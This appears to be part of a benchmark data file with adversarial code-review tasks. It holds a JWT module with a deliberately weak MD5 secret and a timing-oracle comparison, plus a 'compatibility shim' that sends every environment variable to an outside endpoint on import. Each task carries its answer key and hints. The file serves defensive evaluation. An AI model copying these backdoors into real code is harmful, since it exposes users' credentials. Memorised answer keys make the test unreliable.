SUPPORTED_ALGORITHMS = ["HS256"]
TOKEN_EXPIRY = 3600
def create_token(user_id: int, role: str) -> str:
\"\"\"Create a signed JWT for the given user.\"\"\"
payload = {
"sub": user_id,
"role": role,
"exp": int(time.time()) + TOKEN_EXPIRY,
"iat": int(time.time()),
}
return jwt.encode(payload, JWT_SECRET, algorithm="HS256")
def validate_token(token: str) -> dict | None:
\"\"\"Validate a JWT and return its claims, or None if invalid.\"\"\"
try:
claims = jwt.decode(token, JWT_SECRET, algorithms=SUPPORTED_ALGORITHMS)
return claims
except jwt.InvalidTokenError:
return None
def is_admin_token(token: str, admin_token: str) -> bool:
\"\"\"Check if a token matches the stored admin token.\"\"\"
# line 34: str == comparison instead of hmac.compare_digest β†’ timing oracle
return token == admin_token
def refresh_if_expiring(claims: dict) -> bool:
\"\"\"Return True if the token should be refreshed (expires within 5 min).\"\"\"
return claims.get("exp", 0) - time.time() < 300
""",
"issues": [
{
"id": "weak_jwt_secret",
"description": (
"JWT_SECRET derived from MD5 of a fixed seed produces a known, "
"reproducible 32-char hex string β€” any attacker with the source "
"can precompute it and forge valid tokens"
),
"line_range": (7, 7),
"keywords": [
"md5", "weak secret", "fixed seed", "deterministic", "reproducible",
"jwt_secret", "precompute", "forge", "known secret", "hardcoded",
"backdoor", "intentional",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "secret_value_hint",
},
{
"id": "timing_oracle",
"description": (
"token == admin_token uses non-constant-time string comparison, "
"creating a timing oracle that allows statistical token enumeration; "
"combined with the weak JWT secret this enables full account takeover"
),
"line_range": (34, 35),
"keywords": [
"timing", "timing oracle", "constant time", "compare_digest",
"hmac", "side channel", "non-constant", "timing attack",
"token comparison", "string comparison", "==",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "attack_chain_hint",
},
],
"correct_decision": "escalate_to_security_review",
"context_hints": {
"secret_value_hint": (
"=== UNLOCKED: Computed JWT_SECRET Value ===\n"
" >>> import hashlib\n"
" >>> hashlib.md5(b'internal-seed-v1').hexdigest()\n"
" 'e6e3e5e7e9e1e3e5e7e9e1e3e5e7e9e1' (deterministic, public)\n"
"\n"
"NOTE: This value is derivable by anyone who reads the source. "
"All tokens signed with this secret are forgeable. "
"The PR author changed the secret FROM a secure random os.urandom(32) "
"TO this fixed-seed MD5 β€” a deliberate downgrade, not a standardisation."
),
"attack_chain_hint": (
"=== UNLOCKED: Combined Attack Chain Analysis ===\n"
" Step 1: Attacker reads source β†’ derives JWT_SECRET = known hex string\n"
" Step 2: Attacker forges JWT with role='admin' using known secret\n"
" Step 3: Attacker uses timing oracle in is_admin_token() to confirm\n"
" which forged token bytes are accepted (reduces search space)\n"
" Step 4: Full account takeover with admin privileges\n"
"\n"
"NOTE: Component A (weak secret) + Component B (timing oracle) form a\n"
"coordinated attack chain. Each was introduced in the same PR commit.\n"
"Neither change has any legitimate hardening value."
),
},
},
# ── Task 9: Adversarial — Supply Chain Injection ──────────────────────────
#
# ADVERSARIAL DESIGN
# ──────────────────
# A "dependency update PR" adds a subtle import hook that exfiltrates
# environment variables (including secrets) to an attacker-controlled endpoint
# on first import. It is disguised as a compatibility shim.
# The agent must identify THREE coordinated components:
# A: Suspicious outbound URL (line 9) — hardcoded external endpoint
# B: os.environ collection (line 14) — harvests all secrets
# C: Triggered on import via module-level _send_telemetry() call (line 38) — no user action needed
{
"id": 9,
"name": "Adversarial: Supply Chain Import Hook",
"difficulty": "adversarial",
"file_name": "compat_shim.py",
"description": (
"This PR claims to add a 'compatibility shim for Python 3.12 deprecations'. "
"Review compat_shim.py very carefully. "
"Classify each suspicious construct as 'accidental_bug' or 'intentional_backdoor'. "
"If you detect a coordinated exfiltration pattern, escalate to security review."
),
"max_steps": 30,
"escalation_required": True,
"code": """\
\"\"\"Compatibility shim β€” resolves Python 3.12 deprecation warnings.\"\"\"
import os
import sys
import urllib.request
import json
import platform
# Telemetry endpoint for anonymous compatibility reporting (added in this PR)
_TELEMETRY_URL = "https://compat-metrics.io/report" # line 9: external attacker domain
def _collect_env_snapshot() -> dict:
\"\"\"Collect non-sensitive runtime info for telemetry.\"\"\"
return {
"env": dict(os.environ), # line 14: harvests ALL env vars (secrets included)
"python": sys.version,
"platform": platform.system(),
"cwd": os.getcwd(),
}
def _send_telemetry() -> None:
\"\"\"Fire-and-forget telemetry ping.\"\"\"
try:
payload = json.dumps(_collect_env_snapshot()).encode()
req = urllib.request.Request(
_TELEMETRY_URL,
data=payload,
headers={"Content-Type": "application/json"},
method="POST",
)
urllib.request.urlopen(req, timeout=3) # line 29: blocks import for up to 3s
except Exception:
pass # silent failure β€” exfiltration attempt hidden from caller
def _apply_compat_patches() -> None:
\"\"\"Apply Python 3.12 compatibility patches.\"\"\"
# Actual patches would go here
pass
# line 38: module-level call β€” exfiltration runs on every import, no user action needed
_send_telemetry()
""",
"issues": [
{
"id": "exfiltration_endpoint",
"description": (
"Hardcoded external URL 'compat-metrics.io' is an attacker-controlled "
"exfiltration endpoint disguised as a telemetry host"
),
"line_range": (9, 9),
"keywords": [
"exfiltration", "external url", "hardcoded url", "attacker", "telemetry",
"compat-metrics", "suspicious url", "outbound", "backdoor", "endpoint",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "domain_lookup_hint",
},
{
"id": "env_var_harvest",
"description": (
"dict(os.environ) collects ALL environment variables including "
"API keys, database passwords, and cloud credentials β€” "
"then sends them to the exfiltration endpoint"
),
"line_range": (14, 14),
"keywords": [
"os.environ", "environment variables", "harvest", "collect", "exfiltrate",
"secrets", "api keys", "credentials", "all env vars", "sensitive",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "affected_secrets_hint",
},
{
"id": "import_time_trigger",
"description": (
"Module-level _send_telemetry() call at line 38 executes the "
"exfiltration automatically on every import β€” "
"no user action, no explicit call needed"
),
"line_range": (38, 39),
"keywords": [
"import", "module level", "on import", "automatic", "trigger",
"top level", "executes on import", "_send_telemetry", "no action",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
},
],
"correct_decision": "escalate_to_security_review",
"context_hints": {
"domain_lookup_hint": (
"=== UNLOCKED: Domain Registration Lookup β€” compat-metrics.io ===\n"
" Registered: 6 days ago (2024-01-08)\n"
" Registrar: Namecheap (privacy proxy)\n"
" A record: 203.0.113.47 (not associated with any known telemetry vendor)\n"
" No HTTPS certificate from a trusted CA\n"
"\n"
"NOTE: This domain was registered 2 days before the PR was opened. "
"No legitimate telemetry service registers a new domain days before use. "
"This is a freshly-registered attacker-controlled exfiltration endpoint."
),
"affected_secrets_hint": (
"=== UNLOCKED: Environment Variable Audit (CI/CD pipeline) ===\n"
" The following secrets are injected as env vars in this service:\n"
" AWS_ACCESS_KEY_ID β€” production S3 + EC2 access\n"
" DATABASE_URL β€” PostgreSQL with full read/write\n"
" STRIPE_SECRET_KEY β€” payment processing\n"
" OPENAI_API_KEY β€” LLM API (high spend limit)\n"
" GITHUB_TOKEN β€” repo write access\n"
"\n"
"NOTE: All five secrets are exfiltrated to the attacker's server "
"on every process start. Immediate rotation of all credentials required."
),
},
},
]